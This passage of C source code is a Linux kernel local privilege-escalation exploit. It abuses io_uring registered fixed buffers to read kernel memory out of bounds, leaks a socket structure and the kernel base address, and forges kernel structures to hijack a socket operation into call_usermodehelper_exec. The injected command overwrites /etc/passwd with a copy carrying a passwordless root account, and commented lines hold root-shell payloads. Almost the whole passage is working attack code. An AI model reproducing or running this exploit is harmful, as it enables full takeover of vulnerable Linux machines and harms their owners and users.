    struct io_uring_sqe * sqe;
    struct io_uring_cqe* cqe;
    int ret;
    sqe = io_uring_get_sqe(ring);
    switch (FLAGS)
    {
    case SUBMIT_WRITE:
        io_uring_prep_write_fixed(sqe,fd,buf,size,0,0);
        break;
    case SUBMIT_READ:
        io_uring_prep_read_fixed(sqe,fd,buf,size,0,0);
        break;
    default:
        return;
    }
    ret = io_uring_submit(ring);
    if (ret < 0) {
        die("failed io_uring_submit");
    }
    io_uring_wait_cqe(ring,&cqe);
    io_uring_cqe_seen(ring,cqe);
}

void prep_file(){
    FILE *sourceFile, *destFile;
    char buffer[256];
    sourceFile = fopen("/etc/passwd", "r");
    if (sourceFile == NULL) {
        die("open failed");
    }
    destFile = fopen("/home/mowen/passwd", "w");
    if (destFile == NULL) {
        die("open failed");
    }
    while (fgets(buffer, sizeof(buffer), sourceFile) != NULL) {
        fputs(buffer, destFile);
    }
    fprintf(destFile, "hacker::0:0:root:/root:/bin/sh\n");
    fclose(sourceFile);
    fclose(destFile);
    logu("prep_file");
}

int main(void){
#define SOCK_DEF_READALBE_OFFSET 0xcf7540
#define CALL_USERMODEHELPER_EXEC_WORK_OFFSET 0xfe610
#define CALL_USERMODEHELPER_EXEC_OFFSET 0xfe080
#define call_usermodehelper_exec_async_offset 0xfe4a0
    int ret,nr_memfds,nr_sockets,tmp;
    int *memfds,*sockets;
    int recv_fd,recv_fd2,block_size;
    void* recv_buf,*recv_buf2;
    int nr_pages;
    void* oob_buf ;
    struct io_uring ring;
    struct iovec uiovec;
    struct io_uring_cqe* cqe;
    struct io_uring_sqe* sqe;
    BLUE;puts("[*]start");CLOSE;
    prep_file();
    bind_cpu(0);
    // 1. Lift the limits on the current process
    prep_rlimit(&nr_memfds,&nr_sockets);
    // 2. Initialize io_uring and the shared areas
    logu("io_uring_queue_init");
    io_uring_queue_init(4,&ring,0);
    memfds = malloc(sizeof(*memfds)*nr_memfds);
    sockets = malloc(sizeof(*sockets)*nr_sockets);
    logu("init memfds && sockets");
    for (size_t i = 0,tmp=0; i < nr_memfds; i++)
    {
        memfds[i]=setup_memfd_physics("mowen_fd",1);
        if(i < nr_sockets) {
            sockets[i] = setup_socket(SOCKET_TAG);
            tmp++;
        }
    }
    nr_sockets = tmp;
    nr_pages = 65000;
    logu("init recv_buf");
    block_size = 0x100;
    recv_fd=setup_memfd_physics("recv_fd",block_size);
    recv_buf = mmap(0,block_size*PAGE_SIZE,PROT_WRITE|PROT_READ,
                    MAP_SHARED,recv_fd,0);
    recv_fd2=setup_memfd_physics("recv_fd2",block_size);
    recv_buf2 = mmap(0,0x5000,PROT_WRITE|PROT_READ,
                     MAP_SHARED,recv_fd,0);
    if(recv_buf==MAP_FAILED || recv_buf2==MAP_FAILED)
        die("failed mmap recv_buf");
    logi("recv_buf -> %p",recv_buf);
    for (size_t i = 0; i < nr_pages; i++)
    {
        // 3. Register the fixed buf
        logu("memfds bind virtual");
        memfds_bind_virtual(memfds[i],nr_pages);
        oob_buf = VIR_START_ADDR;
        uiovec.iov_base = oob_buf;
        uiovec.iov_len = nr_pages* PAGE_SIZE;
        logi("io_uring_register_buffers");
        ret = io_uring_register_buffers(&ring,&uiovec,1);
        if( ret < 0 )die("failed io_uring_register_buffers");
        logd("uiovec.iov_base -> %p uiovec.iov_len -> %llx",uiovec.iov_base,uiovec.iov_len);
        // 4. Try the oob
        for (size_t vir_off = 0; vir_off < (nr_pages-block_size); vir_off+=block_size)
        {
            void* oob_addr = uiovec.iov_base+vir_off*PAGE_SIZE;
            submit_sqe(&ring,recv_fd,oob_addr,block_size,SUBMIT_WRITE);
            // binary_dump("recv_buf",recv_buf,block_size*PAGE_SIZE);
            ret= leak_sock_addr(recv_buf,block_size*PAGE_SIZE);
            if (ret==-1) continue;
            // oob read succeeded, start extracting information
            logu("oob_addr -> %p offset -> %p",oob_addr,vir_off*PAGE_SIZE);
            void* sock_addr = oob_addr+ret;
            logi("offset : %d v2p_sock_addr : %p",ret,sock_addr);
            // Seek to the physical location and read out the complete sock
            submit_sqe(&ring,recv_fd,sock_addr,0x2000,SUBMIT_WRITE);
            memcpy(recv_buf2,recv_buf,0x2000);
            // recv_buf now contains the complete sock structure
            void* sock = (void*)recv_buf;
            logu("sock->sk_pacing_rate : 0x%llx",*(size_t*)(sock+456));
            logu("sock->sk_max_pacing_rate : 0x%llx",*(size_t*)(sock+456+8));
            int rcvbuf = *(int*)(sock+280);
            int sock_fd = GET_RCVBUF(rcvbuf);
            logu("sock->rcvbuf : 0x%x sock_fd -> %d",rcvbuf,sock_fd);
            uint64_t sock_def_readable = *(uint64_t*)(sock+0x2a8);
            vmlinux_base = sock_def_readable - SOCK_DEF_READALBE_OFFSET;
            showAddr(vmlinux_base);
            uint64_t slub_sock_addr = *(uint64_t*)(sock+0xd8);
            slub_sock_addr -= 0xd8;
            showAddr(slub_sock_addr);
            // First lay out the required strings on the sock
            // char cmd_argv[] = {"/bin/sh", "-c","/bin/sh &>/dev/ttyS0 </dev/ttyS0", NULL};
            // char cmd_argv[] = "/bin/sh\x00-c\x00/bin/sh &>/dev/ttyS0 </dev/ttyS0\x00";
            // echo "hacker::0:0:root:/root:/bin/sh" >> /etc/passwd
            char cmd_argv[] = "/usr/bin/mv\x00-f\x00/home/mowen/passwd\x00/etc/passwd\x00";
            uint64_t path_addr =slub_sock_addr;
            uint64_t argv_addr =slub_sock_addr;
#define sk_priority_offset 0x1c0-0x20
#define sk_error_queue_offset 0xc0-0x10
#define sk_sk_socket_offset 0x270
#define socket_ops_offset 0x20
#define ops_set_rcvlowat_offset 0xe0
#define arg1_offset 11+1
#define arg2_offset arg1_offset+2+1
#define arg3_offset arg2_offset+18+1
#define kernel_execve 0x443470
            pid_t pid;
            pid=fork();
            if (!pid)
            {
                memcpy(recv_buf+sk_priority_offset,cmd_argv,80);
                uint64_t* sk_error_queue_addr = (uint64_t*)(recv_buf+sk_error_queue_offset);
                sk_error_queue_addr[0] = slub_sock_addr+sk_priority_offset;
                sk_error_queue_addr[1] = slub_sock_addr+sk_priority_offset+arg1_offset;
                sk_error_queue_addr[2] = slub_sock_addr+sk_priority_offset+arg2_offset;
                sk_error_queue_addr[3] = slub_sock_addr+sk_priority_offset+arg3_offset;
                sk_error_queue_addr[4] = 0;
                // Overwrite socket -> ops -> set_rcvlowat == call_usermodehelper_exec
                // ops + 0x20 = set_rcvlowat
                *(uint64_t*)(recv_buf+sk_sk_socket_offset) = slub_sock_addr+sk_sk_socket_offset;
                *(uint64_t*)(recv_buf+sk_sk_socket_offset+socket_ops_offset) = slub_sock_addr;
                *(uint64_t*)(recv_buf+ops_set_rcvlowat_offset) = vmlinux_base + CALL_USERMODEHELPER_EXEC_OFFSET;
                // Forge subprocess_info
                uint64_t subprocess_info[11];
                memset(subprocess_info,0,sizeof(subprocess_info));
                subprocess_info[0] == 0x80;
                subprocess_info[1] == slub_sock_addr + 8; // work_struct.entry.next
                subprocess_info[2] == slub_sock_addr + 8; // work_struct.entry.prev
                subprocess_info[3] = vmlinux_base+CALL_USERMODEHELPER_EXEC_WORK_OFFSET; // func == call_usermodehelper_exec_work
                subprocess_info[5] = slub_sock_addr+sk_priority_offset; // path_string_addr
                subprocess_info[6] = slub_sock_addr+sk_error_queue_offset; // argv_strings_addr
                memcpy(recv_buf,subprocess_info,sizeof(subprocess_info));
                submit_sqe(&ring,recv_fd,sock_addr,0x2000,SUBMIT_READ);
                logu("call_usermodehelper_exec fake done");
                int val = 0;
                setsockopt(sock_fd, SOL_SOCKET, SO_RCVLOWAT, &val, sizeof(val));
                logu("child done");
            }
            logu("father start");
            // waitpid(pid,0,0);
            sleep(5);
            submit_sqe(&ring,recv_fd2,sock_addr,0x2000,SUBMIT_READ);
            debug("debug oob_addr(%p)",oob_addr);
            logu("father done");
            // sleep(10);
            exit(-1);
        }
        io_uring_unregister_buffers(&ring);
        munmap(oob_buf,nr_pages* PAGE_SIZE);
    }
    munmap(recv_buf,block_size*PAGE_SIZE);
    close(recv_fd);
    for (size_t i = 0; i < nr_memfds ; i++)
    {
        close(sockets[i]);
        close(memfds[i]);
    }
    BLUE;puts("[*]end");CLOSE;
    return 0;
}

void bind_cpu(int core){
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
    BLUE;printf("[*] bind_cpu(%d)",core);CLOSE;
}
```